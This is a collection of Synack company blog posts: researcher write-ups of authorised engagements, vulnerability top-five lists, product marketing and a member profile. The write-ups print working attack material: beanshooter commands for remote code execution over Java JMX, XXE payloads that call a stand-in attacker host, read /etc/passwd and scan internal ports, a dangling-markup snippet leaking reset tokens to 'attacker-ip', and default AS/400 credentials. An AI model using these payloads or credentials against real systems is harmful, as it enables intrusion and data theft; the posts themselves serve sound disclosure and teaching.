Popeax is a member of the Synack Red Team.

Often people think security research requires deep knowledge of systems and exploits, and sometimes it does, but in this case all it took was some curiosity and a Google search to find an alarmingly simple exploit using default credentials.

On a recent host engagement, I discovered an unusual login page running on port 8080, a standard but less often used HTTP port. The login page did not resemble anything I had encountered in the thousands of login pages across hundreds of client engagements.

Nothing new. Even for a seasoned member of the Synack Red Team (SRT), it isn’t unusual to discover commercial products that one hasn’t seen before.

The login page clearly showed the product as some type of IBM server. In the URL, I noticed the string “profoundui.” A quick Internet search identified an IBM resource that stated:

“Profound UI is a graphical, browser-based framework that makes it easy to transform existing RPG applications into Web applications, or develop new rich Web and mobile applications that run on the IBM i (previously known as the AS/400, iSeries, System i) platform using RPG, PHP, or Node.js.”

Given these facts, I Googled for “IBM AS/400 default password” and found IBM documentation that listed default AS/400 credentials.

As any elite hacker would do, I copied and pasted all six default usernames and passwords into the login form.

Sure enough the last set of credentials worked with user QSRVBAS and password QSRVBAS.

It was beyond the scope of the engagement to proceed any further to see how much access was possible. The vulnerability was documented in the report that was given to the client to be remediated.

After a few days, the client requested a patch verification of the vulnerability using Synack’s patch verification workflow. This workflow allows a client to request the SRT to verify an implemented patch within the Synack Platform. After receiving the patch verification request, I quickly verified the vulnerability was no longer exploitable.

It is hard to believe, but even today commercial products still ship and are installed with default credentials. Often the onus is on the end user to be aware they must change the credentials and lock the default accounts.

The ingenuity and curiosity of the SRT cannot be replicated by scanners or automated technology. The SRT members are adept at finding this type of vulnerability in custom and commercial applications, even while running in obscure locations, which leads to exploitable vulnerabilities being surfaced to the customer.

The post Exploits Explained: Default Credentials Still a Problem Today appeared first on Synack.

IT and Cybersecurity leaders need the clearest picture of their networks and assets to understand if their organizations are at risk and what to do about it. When it comes to looking ahead at zero day vulnerabilities, it can be helpful for leaders to first look back to understand the collective strengths and weaknesses of the cybersecurity industry and the effects they’ve had on the different risks and threats it’s tasked with analyzing and preventing.

As a helpful tool for 2023 strategic cybersecurity planning, we’re highlighting the most common vulnerability categories found in 2022, across more than 27,000 discovered vulnerabilities by the Synack Red Team. Each of these vulnerabilities have the potential to pose significant threats to large organizations and will continue to be monitored as we move through the year.

Here are the top five vulnerability categories found by Synack in 2022:

#1 Authorization Permission

The most common vulnerability found in 2022 relates to improper authorizations. With authorizations, a user’s right to “access a given resource [is] based on the user’s privileges and any permissions or other access-control specifications that apply to the resource.” In this case, unauthorized users may gain access to resources or initiate unwanted actions that they should not be allowed to perform, potentially leading to data exposures, DoS or arbitrary code execution.

#2 Cross Site Request Forgery

The runner up vulnerability is Cross Site Request Forgery (CSRF), which is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

#3 Information Disclosure

Information Disclosure can occur due to security mistakes which expose sensitive information to an actor that is not explicitly authorized to have access to that information. Information exposures can occur in different ways, resulting from mistakes that occur in behaviors that explicitly manage, store, transfer or cleanse sensitive information. 

#4 SQL Injection

This attack style consists of insertion or injection of a SQL query via the input data from client to application. A successful exploit of this style can read and even modify sensitive data, execute admin functions (including shutting down systems), and in some cases, issue commands to an operating system.

#5 Authentication Session Management

Broken Authentication Session Management vulnerabilities round out the Top 5 found by Synack in 2022. Websites may require users to login using a username and password, MFA or other authentication schemes, which may contain exploitable vulnerabilities. The site will assign and send each logged in visitor a unique session ID that serves as a key to the user’s identity on the server, if the session ID is not properly secured a cybercriminal can impersonate a valid user and access that user’s account.

How to Reduce Your Exposure to a Top 5 Vulnerability

Synack offers an offensive security testing platform allowing enterprise customers to track exploitable vulnerabilities in their environment and to close security gaps before they can be exploited by bad actors. The Synack Platform pairs the Synack Red Team, a community of 1,500 expert and vetted adversarial researchers, with the machine intelligence in our platform. Synack’s security testing missions cover web assets and host assets, as well as mobile, cloud and API security.

If you’re not penetration testing on a continuous basis, you should be. Talk to your Synack rep or your authorized security sales representative to learn more about strategic security testing.

The post Synack’s Top 5 Vulnerabilities Found in 2022 appeared first on Synack.

Nicolas Krassas is a member of the Synack Red Team and has earned distinctions such as SRT Envoy and Guardian of Trust.

Of all the Synack targets, my favorite ones are always host assessments. There, one can find a multitude of services with different configurations, versions and usage. One that always caused me trouble was the Java RMI case, until I decided to spend time reviewing the process step by step.

Throughout the years there were several targets where skilled Synack Red Team (SRT) members were able to successfully exploit vulnerabilities with Remote Code Execution, and this information in many cases was missing from my arsenal. I set a goal to find out how the exploitation was taking place and to be able to better understand the tools and methods to finding and exploiting it.

A few “good to know” items:

What is Java RMI used for?

The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language.

What is JMX?

Wikipedia describes Java Management Extensions (JMX) as follows, “Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks.”

JMX is often described as the “Java version” of SNMP (Simple Network Management Protocol). SNMP is mainly used to monitor network components like network switches or routers. Like SNMP, JMX is also used for monitoring Java-based applications. The most common use case for JMX is monitoring the availability and performance of a Java application server from a central monitoring solution like Nagios, Icinga or Zabbix.

JMX also shares another similarity with SNMP: While most companies only use the monitoring capabilities, JMX is actually much more powerful. JMX allows the user not only to read values from the remote system, it can also be used to invoke methods on the system.

JMX fundamentals: MBeans

JMX allows you to manage resources as managed beans (MBean). An MBean is a Java Bean class that follows certain design rules of the JMX standard. An MBean can represent a device, an application or any resource that needs to be managed over JMX. You can access these MBeans via JMX, query attributes and invoke Bean methods.

The JMX standard differs between various MBean types; however, we will only deal with the standard MBeans here. To be a valid MBean, a Java class must:

• Implement an interface
• Provide a default constructor (without any arguments)
• Follow certain naming conventions, for example implement getter/setter methods to read/write attributes

MBean server

An MBean server is a service that manages the MBeans of a system, which we’ll see demonstrated in an attack later in this post. Developers can register their MBeans in the server following a specific naming pattern. The MBean server will forward incoming messages to the registered MBeans. The service is also responsible for forwarding messages from MBeans to external components.

After we have a JMX service running on RMI, we can go through the various ways such a service might be attacked. Over time, various attack techniques have been discovered that are related to JMX over RMI, and we will step through most of them one by one.

Abusing available MBeans

Applications are able to register additional MBeans, which can then be invoked remotely. JMX is commonly used for managing applications, therefore the MBeans are often very powerful.

A failed start

Starting research on the topic, the first items that one will see are references to rmiscout, an exceptional tool on the time that was created but not maintained anymore for over two years with several issues on deployment. At that time I moved on BaRMie, which surprisingly is even older than rmiscout but easier to work with for basic recon. An alternative tool, under the name mjet, seems to be more updated and somewhat easier to use but still my results were poor. As one can see right away, many times simply taking a tool from the shelves and trying to work with it is not a solution.

Back to school

Simply using the tools without understanding exactly what they do won’t work in the long run and that’s something that I was aware of from the start. But everybody is looking for shortcuts.  Back to reading then, and starting with posts such as this one and this one. I ended up on a relatively recent presentation from Tobias Neitzel, where he also presented his tools, RMG and Beanshooter.

New tools, new methods

With a better understanding and with a pair of excellent tools, the results were the following over the next months. 

On a target with several weeks already being launched, the RMI service was not noticed or exploited at that time. The following steps provided an RCE case.

Identifying:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  enum server_ip 9999

Tonka bean deployment:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar tonka deploy server_ip 9999 –stager-url http://tupoc:8888 –no-stager

On our Tupoc (external Synack collaborator system) 

Waiting for a callback:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar stager xxx.xx.xx.xx 8888 tonka

Verification:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  tonka status server_ip 9999 

Command execution:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  tonka exec server_ip 9999 id

The case was awarded with a full RCE reward.

Not all cases will happen to be straightforward and in rare occasions issues might arise, but with better understanding of the process and the tools, we are always able to achieve better results.

References:
https://www.youtube.com/watch?v=t_aw1mDNhzI (Amazing work by Tobias Neitzel)
https://docs.jboss.org/jbossas/jboss4guide/r5/html/ch2.chapter.html
https://docs.alfresco.com/content-services/7.0/admin/jmx-reference/

Final notes

During the process, a few issues were identified in the tools that were handled swiftly and additionally an issue was created towards Glassfish repo under, https://github.com/eclipse-ee4j/glassfish/issues/24223.

The post Exploits Explained: Java JMX’s Exploitation Problems and Resolutions appeared first on Synack.

Government agencies are faced with cybersecurity challenges from all sides. Digital transformation initiatives can expose weak points in an attack surface, putting pressure on agencies’ IT teams to get it just right. And from insider threats to persistent vulnerabilities within networks and operating systems, public sector leaders feel the urgency to obtain a clear picture of what’s most at-risk.

As we kick off 2023, the Synack Red Team reviewed the most common vulnerabilities found in 2022. Each of these vulnerabilities have the potential to pose significant threats to large organizations—governments and beyond—and will continue to be monitored as we move through 2023.

Here are the top 5 vulnerability categories found by Synack in government accounts in 2022:

#5: Remote Execution

Remote Code Execution refers to a vulnerability where an unauthenticated attacker can remotely execute commands to place malware or malicious code on your network or hardware.

#4: Brute Force

In a brute force attack, attackers utilize exhaustive key searches to constantly search and systematically check possible passwords or passphrases until the correct one is found. This can lead to successful phishing attacks and more.

#3: SQL Injection

This attack style consists of insertion or injection of a SQL query via the input data from client to application. A successful exploit of this style can read and even modify sensitive data, execute admin functions (including shutting down systems), and in some cases, issue commands to an operating system.

 

 #2: Authorization Permissions

The second most common vulnerability found in 2022 relates to improper authorizations. With authorizations, a user’s right to “access a given resource [is] based on the user’s privileges and any permissions or other access-control specifications that apply to the resource.” In this case, unauthorized users may gain access to resources or initiate unwanted actions that they should not be allowed to perform, potentially leading to data exposures, DoS, or arbitrary code execution.

#1: Cross Site Scripting XSS 

The most found vulnerability among Synack’s government missions in 2022 was cross-site scripting (XSS). According to NIST, this vulnerability “allows attackers to inject malicious code into an otherwise benign website. These scripts acquire the permissions of scripts generated by the target website and can therefore compromise the confidentiality and integrity of data transfers between website and client. Websites are vulnerable if they display user-supplied data from requests or forms without sanitizing the data so that it is not executable.”

Government organizations need to stay on top of these and countless other vulnerabilities, and mandates are pushing security teams to address this head on by adopting a zero trust model. At a high level, a Zero Trust Architecture provides a framework and structural guidance to ensure that only the individuals and systems who need access, have access. Dedicated and continuous application security testing programs are a critical piece to achieving a zero trust paradigm, and investment in security testing is critical to ensuring agencies in the United States have minimized known vulnerabilities and are adhering to Executive Order 14028 and Memorandum 22-09.

How can my team reduce found vulnerabilities?

• Understand your attack surface. Ensure you have a clear picture of your dynamic assets and that your attack surface is defined. This is key to managing cyber risk. 
• Set your vulnerability alerts. Stay aware of the latest active exploits, vulnerabilities and security issues affecting government and industry-specific verticals by signing up for alerts from CISA.
• TEST! Does your security testing plan include testing for the 5 common vulnerabilities above? Synack can help. Chat with a Synack public sector representative today to learn how the Synack platform empowers in-house teams to scale and protect your mission continuously in a FedRAMP Moderate In Process environment.
• Double down on Vulnerability Management. Make sure you are prioritizing vulnerabilities according to their criticality, patching them and then independently verifying that those patches have worked.
• Orchestrate. Your SOAR has defensive security data from logging, alerting, threat intel and more. You should also integrate Synack continuous penetration testing data to automate your offensive security practices within the SOC. Such an integration will enable continuous, defensive improvements so you can truly grade and improve your security posture.

Additional Resources

READ: Our Guide to Zero Trust
WATCH: Webinar with HHS’ Matthew Shallbetter
LEARN: Synack’s FedRAMP Moderate In Process Certification

The post The Top 5 Cybersecurity Vulnerabilities for Government Agencies in 2022 appeared first on Synack.

Kuldeep Pandya is a member of the Synack Red Team. You can find him on Twitter or his blog.

This writeup is about my recent discovery of a Second Order XXE that allowed me to read files stored on the web server.

One morning, a fresh target was onboarded and I hopped onto it as soon as I received the email. In the scope, there were two web applications listed along with two postman collections. I prefer postman collections over web apps, so I loaded the collections with their environments into my postman.

After sending the very first request, I noticed that the application was using SOAP API to transfer the data. I tried to perform XXE in the SOAP body but the application threw an error saying “DOCTYPE is not allowed”.

Here, we cannot perform XXE as DOCTYPE is explicitly blocked.

Upon checking all the modules one by one, I came across a module named NormalTextRepository in the postman collection which had the following two requests:

• saveNormalText
• GetNamedNormalText

After sending the first saveNormalText request and intercepting it in Burp Suite, I found out that it contained some HTML-encoded data that looked like this:

Upon decoding, the data looked like this:

<?xml version="1.0"?>
<normal xmlns="urn:hl7-org:v3" xmlns:XX="http://REDACTED.com/REDACTED"><content XX:statu

This quickly caught my attention. This was XML data being passed inside the XML body in a SOAP request (Inception vibes).

I went on to try XXE here as well. For this, I copy pasted a simple Blind XXE payload from PortSwigger:

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com/XXETEST"> %xxe; ]>

I used Synack’s provided web server to test for this. Upon checking its logs, I found there indeed was a hit for the /XXETEST endpoint.

This still was a blind XXE and I had to turn it into a full XXE in order to receive a full payout. I tried different file read payloads from PayloadsAllTheThings and HackTricks but they did not seem to work in my case.

For me, the XXE was not reflected anywhere in the response. This is why it was comparatively difficult to exploit.

After poking for a while, I gave up with the idea of full XXE and went ahead to check if an internal port scan was possible or not as I was able to send HTTP requests.

I sent the request to Burp Suite’s intruder and fuzzed for the ports from 1 to 1000. The payload for that looked like the following:

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:§1§/XXETEST"> %xxe; ]>

However, the result of the intruder didn’t make any sense to me. All the ports that I fuzzed were throwing random time delays.

I lost all hope and was about to give up on this XXE once again. Then a thought struck, “If this data is being saved in the application, it has to be retrievable in some way as well.” I checked the other GetNamedNormalText request in this module and instantly felt silly. This request retrieved the data that we saved from the first saveNormalText request.

I used the following XXE file read payload and saved the data:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>

Then sent the second GetNamedNormalText request to retrieve the saved data. And in the response, I could see the contents of the /etc/passwd file!

This was enough for a proof of concept. However, looking at the JSESSIONCOOKIE, I could tell that the application was built using Java. And, in Java applications, if you just provide a directory instead of a file, it will list down the contents of that directory and return it.

To confirm this theory, I just removed the /passwd portion from the above file read payload. The updated payload looked like this:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY example SYSTEM "/etc"> ]>

Upon saving the above payload and retrieving it using the second request, we could see the directory listing of the /etc directory!

I sent it to Synack and they happily triaged it within approximately 2 hours.

The post Exploits Explained: Second Order XXE Exploitation appeared first on Synack.

In your cybersecurity practice, do you ever worry that you’ve left your back door open and an intruder might sneak inside? If you answered yes, you’re not alone. The experience can be a common one, especially for security leaders of large organizations with multiple layers of tech and cross-team collaboration to accomplish live, continuous security workflows.

At Synack, the better way to pentest is one that’s always on, can scale to test for urgent vulnerabilities or compliance needs, and provides transparent, thorough reporting and coverage insight.

Know what’s being tested, where it’s happening and how often it’s occurring 

With Synack365, our Premier Security Testing Platform, you can find relief in the fact that we’re always checking for unlocked doors. To provide better testing oversight, we maintain reports that list all web assets being tested, which our customers have praised. Customer feedback indicated that adding continuous oversight into host assets would also help to know which host or web assets are being tested, when and where they’re being tested, and how much testing has occurred. 

Synack’s expanded Coverage Analytics tells you all that and more for host assets, in addition to our previous coverage details on web applications and API endpoints, all found within the Synack platform. With Coverage Analytics, Synack customers are able to identify which web or host assets have been tested and the nature of the testing performed. This is helpful for auditing purposes and provides proof of testing activity, not just that an asset is in scope. Additionally, Coverage Analytics gives customers an understanding of areas that haven’t been tested as heavily for vulnerabilities and can provide internal red team leaders with direction for supplemental testing and prioritization. 

Unmatched Oversight of Coverage 

Other forms of security testing are unable to provide the details and information Synack Coverage Analytics does. Bug bounty testing typically goes through the untraceable public internet or via tagged headers, which require security researcher cooperation. The number of researchers and hours that they are testing are not easily trackable via these methods, if at all. Traditional penetration testing doesn’t have direct measurement capabilities. Our LaunchPoint infrastructure stands between the Synack Red Team, our community of 1,500 security researchers, and customer assets, so customers have better visibility of the measurable traffic during a test. More and more frequently, we hear that customers are required to provide this kind of information to their auditors in financial services and other industries. 

Benefits of Coverage Analytics 

• Know what’s being tested within your web and host assets: where, when and how much 
• View the traffic generated by the Synack Red Team during pentesting
• Take next steps with confidence; identify where you may need supplemental testing and how to prioritize such testing

Starting today, security leaders can reduce their teams’ fears of pentesting in the dark by knowing what’s being tested, where and how much at any time across both web and host assets. Coverage Analytics makes sharing findings with executive leaders, board members or auditors simple and painless.

Current Synack customers can log in to the Synack Platform to explore Coverage Analytics today. If you have questions or are interested in learning more about Coverage Analytics, part of Synack’s Better Way to Pentest, don’t hesitate to contact us today!

The post Worry-free Pentesting: Continuous Oversight In Offensive Security Testing appeared first on Synack.

Nikhil Srivastava is a Synack Red Team legend and co-founder of Bsides Ahmedabad.

An Account Takeover (ATO) is an attack whereby attackers take ownership of online accounts using several methods. It is unfortunately more common than you’d think, despite all the warnings to create complex passwords, avoid phishing emails and use multi-factor authentication.

Recent research shows 1 in 5 adults have suffered from an account takeover with  average financial losses of approximately $12,000. Further, PerimeterX reported that 75 to 85% of all attempted logins in the second half of 2020 were account takeover attempts. 

The Digital Shadows Research Team exposed an even more concerning statistic: more than 24 billion account usernames and passwords are available for purchase on the dark web. In some cases, purchasing credentials isn’t necessary, as year after year, the most common password is 123456, appearing in one out of every 200 passwords. 

Now that we know just how common ATOs are, let’s review some of the tactics, techniques and procedures (TTPs) used in such attacks.

Account Takeover Methodologies

• Change Email/Password CSRF – The simplest ATO employs phishing. An attacker sends a link to the victim, and when the unsuspecting user clicks on the link, the victim’s email/password will be changed and the attacker can take over their account.
• OAuth CSRF – Consider a website that allows users to log in using either a classic, password-based mechanism or by linking their account to a social media profile using OAuth. In this case, if the application fails to use the state parameter, an attacker could potentially hijack a user’s account on the client application by binding it to their own social media account.
• Default/Weak Credentials – Most products have their own default credentials for things like servers, routers, and Virtual Network Computing (VNC) that sometimes do not get changed. Many applications lack a strong password policy and will allow users to set weak passwords such as 123456.
• Forgot your password? – Sometimes “forget password” implementations can be vulnerable to password reset token leaks, HTTP leaks, bypassing poor security questions, Host header injection or HTTP Parameter Pollution attacks. 
• Credential Stuffing – In this method, attackers use lists of compromised user credentials to breach a system. Bots can be deployed for automation and scale, based on the assumption that many users reuse usernames and passwords across multiple services.

Examples of Account Takeovers

Here are five anonymized ATO case studies from a variety of industries, including healthcare, software, government and commerce. 

Case Study 1 

In the case of an American chain restaurant, I used trufflehog, a Python search tool, to review the target. While scanning the application, it produced an alert of hard-coded, JavaScript credentials. Browsing the JavaScript, I found some UPS credentials had been hard coded, as shown in the screenshot below.

Using these credentials, I was able to login into their UPS account as an admin which granted me access to sensitive information and control over their shipments.

Case Study 2

Another ATO was for a collaboration software application. While resetting the password for an admin account, I found that the application leaked their password reset token in response, as shown in the screenshot below.

Using this token, I was able to reset the admin password. Sometimes, it really is that simple. 

Case Study 3

This is a case study of a product from a medical equipment company. I tested the whole application without getting any vulnerabilities and at the end decided to check the forget password flow. While requesting the password reset token, the application sent the following request that revealed a path for me to exploit.

I used a Dangling Markup such as <img src=”http://attacker-ip/?id= in the email body before the reset link and sent it to the user. Now as soon as the user opens the email, their password reset token will be sent to me instead.

Case Study 4

The scope of this target was a wildcard and unauthenticated testing only, so I first did some reconnaissance. I found an interesting subdomain that asked for a DVN ID and password to login.

I searched about DVN IDs in help articles, and I found out it’s a 9-digit number assigned to all vendors at the time of licensing.

I did Google searches but didn’t come up with this particular ID. I ended up looking at Google images results in hope that licensing could have been done with paper and could have this ID number included.

Cool, I was correct! Licensing was done on paper and I got a couple of valid DVN IDs in the subject of letters, such as: 

Now that I had this ID, I tried brute-forcing to get a password. When that turned up nothing, I retested the “forget password” flow. It asked for the DVN ID first before resetting the password. I found that the application used two requests for resetting the password. One for querying the password for DVN ID and another one sending a newly generated password to their email ID inside the request itself.

So, this disclosed not only their password but emails too. Using the newly generated password, I was able to login into their account.

Case Study 5 

I was scanning targets for an American food and beverage company when I came across an event application. The application asked for a valid user email to login, and those company emails were whitelisted. I tried with my name@companydomain at first to see the error message and I found the following.

I noticed an email for support was given at the bottom of the page to reach out for any trouble. I thought: Why not attempt it? I entered some information and found the following screen:

The application asked to set the password, and after setting up a password, I was able to login as admin:

Further, while checking the attendee directory, I found multiple accounts that could’ve been taken over using the same method.

Conclusion 

It’s hard to believe that someone with little to no technical experience could gain the level of access that I did, but you should! Account takeovers can be complex, but they can also be relatively simple. All it takes is a bit of creativity and motivation, and just about anyone can login as an admin.

The post Account Takeovers:  Believe the Unbelievable appeared first on Synack.

What Is a Bug Bounty Program? 

The concept of bug bounty programs is simple. You allow a group of security researchers, also known as ethical hackers, to access your systems and applications so they can probe for security vulnerabilities – bugs in your code. And you pay them a bounty on the bugs they find. The more bugs the researcher finds, the more money he makes.

Assessing the value or success of bug bounty programs can be difficult. There is no one methodology or approach to implementing and managing a bug bounty program. For example, a program could employ a couple or hackers or several hundred. It could be run internally or with a bug bounty partner. How much does the customer pay for the program and what reward should the hacker get?

While many organizations have jumped on the bug bounty bandwagon over the last decade or so, the results have been disappointing for some. Many companies disappointed by their bug bounty experience have talked with Synack. We can group their experiences into three major categories: researcher vetting and standards, quality of results, and program control and management.

Researcher Vetting and Standards

When you implement a bug bounty program you are relying on ethical hackers, security researchers that have the skills and expertise to break into your system and root around for security vulnerabilities. Someone has to vet those hackers to ensure that they can do the job, that they have the level and diversity of experience required to provide a thorough vulnerability assessment. And how do you know that someone signing up for the program has the right skills and is trustworthy? There are no standards to go by. Some bug bounty programs are open to just about anyone.

Quality of Results

Bug bounty programs are notorious for producing quantity over quality. After all, more bugs found means more rewards. So security managers often find themselves wading through piles of low-quality and low-severity vulnerabilities that divert their attention and resources from serious, exploitable vulnerabilities.  For example, an organization with internal service-level agreements (SLAs) for remediation of vulnerabilities may be forced to spend time on low-priority patching, just to have good metrics. This isn’t always the best path to minimize risk in the organization.

Results can also be highly dependent on the group assigned to do the hacking. Small groups – we have seen some programs that have only a handful of researchers – suffer from a lack of diversity and vision. Large groups usually cast a wider net but are more difficult to manage and control. And how much your researchers get paid is an important consideration. For example, if a company pays “average” compared to other targets on a bug bounty platform, they will not get the attention of above-average researchers. Published reports from bug bounty companies state that only 6-20% of found vulnerabilities have a CVSS (Common Vulnerability Scoring System) of 7.0 or greater, which would be below the typical customer experience seen at Synack.

Program Control and Management

By far the biggest drawback to bug bounty programs is the lack of program control and management. Turning a team of hackers loose to find security bugs is only the first step. Did they demonstrably put in effort in the form of hours or broad coverage?  What happens after bugs are found? How are the results reported? Who follows up with triaging or remediation? Who verifies resolution? 

The short answer is… it depends. Every program has its own processes and procedures. The longer answer is that most bug bounty programs don’t put a lot of effort into this area. Hackers are left to go off on their own with little monitoring. They don’t see analytics that help them efficiently choose where to hack. Internal security teams may need to wade through the resulting reports, triage the found bugs, resolve or remediate the bug condition, and verify that bugs have been appropriately addressed.

An Integrated Approach to Vulnerability Testing

These are just a few of the problems associated with bug bounty programs. But even without these issues, attacking vulnerabilities with a bug bounty program is not a panacea to test your cybersecurity posture. Finding high-criticality vulnerabilities is fine, but you need to consider context when assessing vulnerabilities. You need to take an integrated approach to vulnerability testing.

Synack provides high-quality vulnerability testing through its community of 1,500+ vetted security researchers, the Synack Red Team (SRT). Not tied to a bug bounty concept, Synack manages the SRT and provides a secure platform so they can communicate and perform testing over VPN. Through the platform Synack can monitor all the researcher traffic directly, to analyze, log, throttle or halt it.

Synack researchers are all highly skilled and bug reports typically have signal-to-noise ratios approaching 100%.  High and critical vulnerabilities making up approximately 40% or more of reports is typical. Beyond simply finding bugs, researchers consider context and exploitability and recommend remediation steps. They can retest to confirm resolution or help customers find a more airtight patch.

So when you consider your next offensive security testing program, know what you’re getting with bug bounty programs. Think comprehensive pentesting with a company that can help you locate vulnerabilities that matter and address them, now and in the future.

The post What’s Wrong with Bug Bounty Programs? appeared first on Synack.

Mohammad Jassim is a 17-year-old member of the Synack Red Team. 

In 2017, I was that rare seventh grader who had Ubuntu installed on their laptop. Typing “sudo apt-get install software-center” every chance I got boosted my ego – I was practically Mr. Robot! At this rate, I thought nothing could stop me from taking over the world. Well, until I broke my Chromebook’s screen and got caught bypassing enterprise enrollment.

Call it an early lesson in ethical hacking. But over the next few years, my love for technology grew. I’d had my fair share of living outside my comfort zone as a 13-year-old learning English as my second language. But when it came to technology, I felt at home, like the smartest person in the room. Freshman year came, and I still was acting too smart for my own good. Little did I know, I was about to be surrounded by people who were way smarter than me.

CyberPatriot is an Air Force, blue team-based competition that is strictly focused on teaching defensive cybersecurity. BINGO! A place for me to put in everything I had learned so far, except for the first time in my computer science journey, I was wrong. Turns out, I knew nothing! Saying “I know” every time someone tried to teach me something was the reason I missed out on countless learning opportunities.

CyberPatriot made me  more receptive to learning from others. After getting into an argument with someone on Discord about how Windows uses NTLM hashes (and finding out I was completely wrong), I realized I needed to open my eyes. Becoming a better listener and a more open-minded person helped me become more knowledgeable! So much so that the following year my team and I were able to make it to nationals and place fifth in the “All Service” category!

After a humbling but successful CyberPatriot season, I realized that cybersecurity was the field for me. I liked blue teaming, but I felt limited. So, I learned how to play on the red team. After all, offense is the best defense. In August 2021, my friend Julian got me on HackTheBox and held my hand through the beginner tracks. Immediately, I was hooked! When I was on a break from my fast food job, I rushed to my laptop to spin up a PwnBox and start hacking from my browser. After four months of non-stop boxes and a ProLab I decided it was time to get my Offensive Security Certified Professional certificate (OSCP).

But I had new problems arise. 

1. I was only 16 years old. How was I going to pass the rigorous exam? According to the hacking subreddit, it’s a warzone!
2. My family isn’t exactly the most financially stable. How was I going to afford a $999 course?
3. Did I mention the subreddits say the test is a warzone?

Although those concerns were valid, I thought of some advice my uncle once gave me in his booming voice: “IF THERE’S A WILL THERE’S A WAY, MOHAMMAD!” So I worked away at a tech department job until I was able to afford the exam. In December 2021, I officially bought my OSCP.

The next few months were stressful; I was balancing early college classes and OSCP at the same time. I eventually came around to booking my exam in February. By the end of the exam I not only was able to pass it, I was also the first 16-year-old to ace the new version of the OSCP! 

Knowing me, however, things always tend to go wrong. My 100+ page report was accidentally deleted, uh oh. I hastily rewrote one in two hours and submitted it MINUTES before the deadline. After school on Monday, I was expecting the email to arrive, as my friends and I finally packed up to leave. I heard the notification from my phone and there it was, the OSCP passing email.

Little did I know my life was about to change. After moving to an early college program, my old school informed me that I could no longer compete with their CyberPatriot team. This caused me to panic a little bit as I still wanted to compete for my last two years. In a desperate attempt, I found a team down in Austin. After officially becoming a part of the team, I was introduced to infosec pro Josh Sokol. After I aced my OCSP, Josh was incredibly proud and helped me network. Turns out, Josh knows Ryan Rutan, director of community for the Synack Red Team (SRT), and Ryan wanted me to do the assessment for SRT. This blew my mind: Me?!??! Synack>!>!>!>! hello!??!?!?! After a few assessments and an interview, I was officially a Synack Red Team member.

Fast forward to today, I am an active member of the Synack Red Team. I have a lot I would still like to achieve and definitely need to find a way to contribute and better the platform. This opportunity has helped me to work remotely at 17 while making enough to live comfortably. I would like to end off by saying: I am not a perfect person, nor am I a perfect student, friend, coworker, son or even hacker, however, that’s never stopped me from trying my best. My main purpose is to inspire people to join this amazing field and to be able to find a way to shine—no matter your age. There were so many moments when I could’ve called it quits because I didn’t fit today’s standards, but I didn’t let that stop me. I truly don’t think I’m smarter than anyone, however, I do know for a fact that I love this field. What next you may ask? Well, I still need to finish school, get my OSCE3 at 17 and potentially bug bounty my way into MIT . 

P.S. Extremely special thank yous!

I have to start off with my parents because I wouldn’t be half the pentester I am today without their love and support. Thank you, big bro Julian, for literally everything, if I were to name everything it would be longer than this blog post. Thank you, Eric, for believing in me and never letting me complain about my circumstances. Thank you, Parker, for securing me a spot on the CyberPatriot team. Thank you, Mr. Sokol for believing in me and getting me in touch with the right person. Thank you, Ryan, for taking a chance with me and setting up a mentor system. Speaking of mentors: Thank you Neil, Malcolm, Nicolas, William and Timah – without y’all, my SRT journey would’ve been rough.

The post Growing into the Synack Red Team appeared first on Synack.

The Complementary Benefits of Red Teaming and Pentesting

Deploying Complementary Cybersecurity Tools

In our previous article, we talked about the growing number of cybersecurity tools available on the market and how difficult it can be to choose which ones you need to deploy to protect your information and infrastructure from cyberattack. That article described how Asset Discovery and Management solutions work in concert with Pentesting to ensure that you are testing all of your assets. In this article, we’ll take a look at Red Teaming and how it works together with Pentesting to give you a thorough view of your cybersecurity defenses.

What is Red Teaming and How Is It Different from Pentesting?

Red Teaming and Pentesting are often confused. Red Teaming is a simulated cyberattack on your software or your organization to test your cyber defenses in a real world situation. On the surface this sounds a lot like Pentesting. They are similar and use many of the same testing techniques. But Red Teaming and Pentesting have different objectives and different testing methodologies.

Pentesting Objectives and Testing

Pentesting focuses on the organization’s total vulnerability picture. With Pentesting, the objective is to find as many cybersecurity vulnerabilities as possible, exploit them and determine their risk levels. It is performed across the entire organization, and in Synack’s case it can be done continuously throughout the year but is usually limited to a two-week period. Pentesting teams are best composed from security researchers external to the organization. Testers are provided with knowledge regarding organization assets as well as existing cybersecurity measures. 

Red Team Objectives and Testing

Red Teaming is more like an actual attack. Researchers usually have narrowed objectives, such as accessing a particular folder, exfiltrating specific data or checking vulnerabilities per a specific security guideline. The Red Team’s goal is to test the organization’s detection and response capabilities as well as to exploit defense loopholes. 

Red Teaming and Pentesting Work Together

There are a lot of articles floating around the internet describing Pentesting and Red Teaming and offering suggestions on which tool to choose for your organization. The two solutions have different objectives, but they are complementary. Pentesting provides a broad assessment of your cybersecurity defenses while Red Teaming concentrates on a narrow set of attack objectives to provide information on the depth of those defenses. So why not deploy both?  A security program that combines Red Teaming with Pentesting gives you a more complete picture of your cyber defenses than either one alone can provide. 

